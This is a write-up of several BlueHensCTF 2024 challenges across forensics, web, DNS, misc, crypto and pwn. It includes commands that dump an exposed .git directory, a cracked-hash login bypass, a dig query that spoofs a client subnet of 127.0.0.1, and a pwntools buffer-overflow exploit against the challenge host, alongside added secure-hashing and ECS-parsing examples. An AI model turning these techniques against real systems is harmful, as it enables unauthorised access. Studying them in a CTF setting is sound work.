BlueHensCTF 2024 - Challenges
Published by Josan, 11th Nov 2024
Tags: git, barcode, dig, dns, forensics, gittools, steg, whitespace

Forensics

Whispers of the Feathered Messenger

  • Uploading the image to aperisolve, we get a list of common passwords
  • Trying them one by one, the password 5B4@7q7!rE\ yields a file named encrypted_flag.bin
  • Looking at the extracted file, we see it contains encrypted data
  • Checking the file type with file shows it is OpenSSL-encrypted data
  • Searching online for how to decrypt an OpenSSL-encrypted file, we find this command; adapting it to our file names and supplying the password obtained above:
openssl enc -d -aes-256-cbc -in encrypted.data -out un_encrypted.data

openssl enc -d -aes-256-cbc -in encrypted_flag.bin -out flag.txt
Password entered at the prompt: 5B4@7q7!rE\

  • We got the flag

Inner Demons

  • Uploading the file to aperisolve and checking the result, we didn't get anything
  • The challenge hints at steganography (searching for steg, steganography, steg decrypt)
  • Trying stegseek
stegseek inner_demons.jpg

Web

Intro to Web

  • I am able to see only this message. I tried enumerating directories and subdomains, but couldn't get anything
  • But this message made me think there could be a /.git directory. Navigating to it I got a forbidden page, but we still got the git directory
  • Using the GitTools Dumper to get all the files
./gitdumper.sh https://bluehens-webstuff.chals.io/.git/ /home/j054n/udctf/web/
  • Now we can use the Extractor
/opt/GitTools/Extractor/extractor.sh . Website
  • In one of the commits we are able to see a login page
 
<!doctype html>
<html>
  <head>
    <title>Deeply Insecure Login</title>
    <style>
      .hide {
        display: none;
      }
    </style>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/blueimp-md5/2.10.0/js/md5.js" type="text/javascript" charset="utf-8"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js" type="text/javascript"></script>
  </head>
  <body>
    <h1 id="page">You are NOT logged in.</h1>
    <form id="login">
      <input type="password" id="password" placeholder="Tell me the password to get in."/>
      <button type="submit">Login</button>
    </form>
    <script>
      var form = document.getElementById("login");
      var attemptcount = 0;
      form.addEventListener("submit", function(event){
        event.preventDefault();
 
        attemptcount += 1;
 
        let password = document.getElementById("password").value;
        if (md5(password) == "1c63129ae9db9c60c3e8aa94d3e00495"){
          //You logged in!
          document.getElementById("page").innerHTML = "You ARE logged in... fetching flag";
          form.classList.add('hide');
          $.ajax({
              method:"get",url:"flagme.php",data:{"password":password},success: function(data){
                 $("#page").html(data);
              }
          })
        } else {
          document.getElementById("page").innerHTML = `Still NOT logged in.  ${attemptcount} Attempts.`;
          document.getElementById("password").value = "";
        }
        return false;
      });
    </script>
  </body>
</html>
 
  • Looking up the hash in CrackStation, we get the password
1c63129ae9db9c60c3e8aa94d3e00495:1qaz2wsx
  • Understanding the code, we can get the flag by sending a GET request with the password to flagme.php
curl -X GET "https://bluehens-webstuff.chals.io/flagme.php?password=1qaz2wsx"
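The login page above does its check in the browser against an md5 that is shipped in the HTML, and flagme.php then trusts whatever password the client sends. As an added example that is not part of the challenge or the original post, the Python below puts the page's check next to the server-side version a practitioner would expect: a per-user random salt, a slow hash, a constant-time compare, and the flag released only after that check. The function names and the stored-hash format are my own assumptions.

```python
import hashlib
import hmac
import os

# The page's check, restated server-side for contrast: an unsalted md5 compared
# against a constant that was shipped in the HTML. The hash is therefore public
# and the password can be recovered offline by a plain lookup, as the writeup did.
PAGE_HASH = "1c63129ae9db9c60c3e8aa94d3e00495"

def page_style_check(password):
    return hashlib.md5(password.encode()).hexdigest() == PAGE_HASH

def hash_password(password, iterations=600_000):
    """Stored form (assumed format): pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>.
    A random per-user salt defeats precomputed lookups; the iteration count
    makes every guess cost real CPU time."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())

def verify_password(password, stored):
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                     bytes.fromhex(salt_hex), int(iterations))
    except ValueError:          # malformed record: treat as no match
        return False
    # constant-time comparison so response time does not leak matching prefixes
    return hmac.compare_digest(digest.hex(), digest_hex)

def flagme(request_password, stored, flag):
    """What flagme.php should do: decide on the server, never trust the client's
    own verdict, and only then release the flag."""
    if not verify_password(request_password, stored):
        return "Still NOT logged in."
    return flag
```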


DNS

  • Using the command provided in the challenge
dig TXT flag @129.153.36.153

  • We see a message saying you need to be coming from 127.0.0.1
  • Describing the situation to ChatGPT gave the command below (a Google search turns it up as well)
dig +subnet=127.0.0.1/32 TXT flag @129.153.36.153

  • We got the flag
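The +subnet option puts an EDNS Client Subnet option (ECS, RFC 7871) into the query, and the challenge server hands out the flag because that client-supplied field says 127.0.0.1. As an added example that is not part of the original post, the Python below builds such a TXT query by hand with only the standard library and parses the ECS option back out the way a server would; the packet bytes are constructed, not captured from the challenge.

```python
import struct

OPT_TYPE, ECS_CODE, QTYPE_TXT = 41, 8, 16   # EDNS0 OPT pseudo-RR, ECS option code, TXT

def encode_name(name):
    labels = [l for l in name.strip(".").split(".") if l]
    return b"".join(bytes([len(l)]) + l.encode() for l in labels) + b"\x00"

def build_txt_query_with_ecs(qname, subnet_ip, prefix_len, txid=0x1234):
    """The wire form of `dig +subnet=<ip>/<prefix> TXT <qname>` (RFC 7871 ECS)."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 1)  # RD, 1 question, 1 additional
    question = encode_name(qname) + struct.pack(">HH", QTYPE_TXT, 1)
    addr = bytes(int(o) for o in subnet_ip.split("."))[:(prefix_len + 7) // 8]
    ecs = struct.pack(">HBB", 1, prefix_len, 0) + addr   # family 1 = IPv4, scope prefix 0
    rdata = struct.pack(">HH", ECS_CODE, len(ecs)) + ecs
    opt_rr = b"\x00" + struct.pack(">HHIH", OPT_TYPE, 4096, 0, len(rdata)) + rdata
    return header + question + opt_rr

def skip_name(pkt, off):
    while pkt[off] != 0:
        if pkt[off] & 0xC0 == 0xC0:       # compression pointer ends the name
            return off + 2
        off += 1 + pkt[off]
    return off + 1

def extract_ecs(pkt):
    """Return (ip, prefix_len) from the ECS option, or None if absent.
    The value is supplied by the client, so a server must never treat it as the
    real source of the query; that is exactly what the challenge got wrong."""
    _, _, qd, an, ns, ar = struct.unpack(">HHHHHH", pkt[:12])
    off = 12
    for _ in range(qd):
        off = skip_name(pkt, off) + 4               # QTYPE + QCLASS
    for _ in range(an + ns + ar):
        off = skip_name(pkt, off)
        rtype, _, _, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
        rdata, off = pkt[off + 10:off + 10 + rdlen], off + 10 + rdlen
        pos = 0
        while rtype == OPT_TYPE and pos + 4 <= len(rdata):
            code, olen = struct.unpack(">HH", rdata[pos:pos + 4])
            body, pos = rdata[pos + 4:pos + 4 + olen], pos + 4 + olen
            if code == ECS_CODE and body[:2] == b"\x00\x01":   # IPv4 family
                addr = body[4:].ljust(4, b"\x00")
                return ".".join(str(b) for b in addr), body[2]
    return None
```

A server that wants to restrict a record to local clients has to look at the socket's peer address; ECS exists so that a resolver can forward a client's approximate location, and any client can set it to anything, as the +subnet run above shows.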

Misc

AlgebrarbegIA

  • Getting the factorial of 78 and 87 from an online source
  • Actually, !87 is the subfactorial, so we get the subfactorial of 87 instead
2k = 78! + !87

then,

k = (78! + !87)/2

  • The code is below
seventy8 = 11324281178206297831457521158732046228731749579488251990048962825668835325234200766245086213177344000000000000000000  # 78!
eighty7 = 775400577052889667046640780055684375763111543171042155757864819229947211564419831641783864807987394389543160788597793657791613938734  # !87, the subfactorial

k = (seventy8 + eighty7) // 2
print(f"udctf{{{k}}}")
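Rather than pasting the two constants from a calculator, both values can be computed directly: 78! with math.factorial and !87 with the recurrence !n = n·!(n-1) + (-1)^n, which is how the subfactorial is defined. The code below is an added example, not from the original post; it also checks that 78! + !87 is even, since the equation 2k = 78! + !87 only has an integer solution in that case.

```python
from math import factorial

def subfactorial(n):
    """Number of derangements of n items, !n, via !n = n * !(n-1) + (-1)^n with !0 = 1."""
    d = 1
    for i in range(1, n + 1):
        d = i * d + (-1 if i % 2 else 1)
    return d

def solve_k(a=78, b=87):
    """Solve 2k = a! + !b for k; raises if the right-hand side is odd (no integer k)."""
    total = factorial(a) + subfactorial(b)
    if total % 2:
        raise ValueError("a! + !b is odd, so k is not an integer")
    return total // 2

if __name__ == "__main__":
    # same flag format as the page's own snippet
    print(f"udctf{{{solve_k()}}}")
```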

Bees in Space

  • We got a text file
  • Copying and pasting it into the Whitespace decoder on dCode

  • We got the flag

Crypto

  • We get a txt file containing a sequence of numbers
85 68 67 84 70 123 98 52 114 99 48 100 51 115 95 99 52 110 95 98 51 95 102 117 110 95 116 48 48 125
  • Throwing it into CyberChef, we get the flag

Pwn

Intro to PWN

  • We are able to see the vuln function
  • We send exactly 0x38 bytes of padding, since the buffer is local_38, to reach the return address on the stack
  • After reaching the return address, we overwrite it with the address of the win function, 0x1196 (the remaining higher bytes, such as 0x000040, are unchanged and so omitted here), adding 8 to land past the start of win and avoid misaligning the stack

  • Building the code
exploit.py
from pwn import *

elf = ELF("./pwnme", checksec=True)
context.binary = elf

p = remote("0.cloud.chals.io", 13545)

# 0x38 bytes fill the buffer (local_38) and the saved rbp, up to the return address
payload = b"A" * 0x38
# return into win, 8 bytes past its start so the stack stays aligned
payload += p64(elf.sym["win"] + 8)
print(hex(elf.sym["win"]))
print(hex(elf.sym["win"] + 8))
print(payload)
p.sendline(payload)
p.interactive()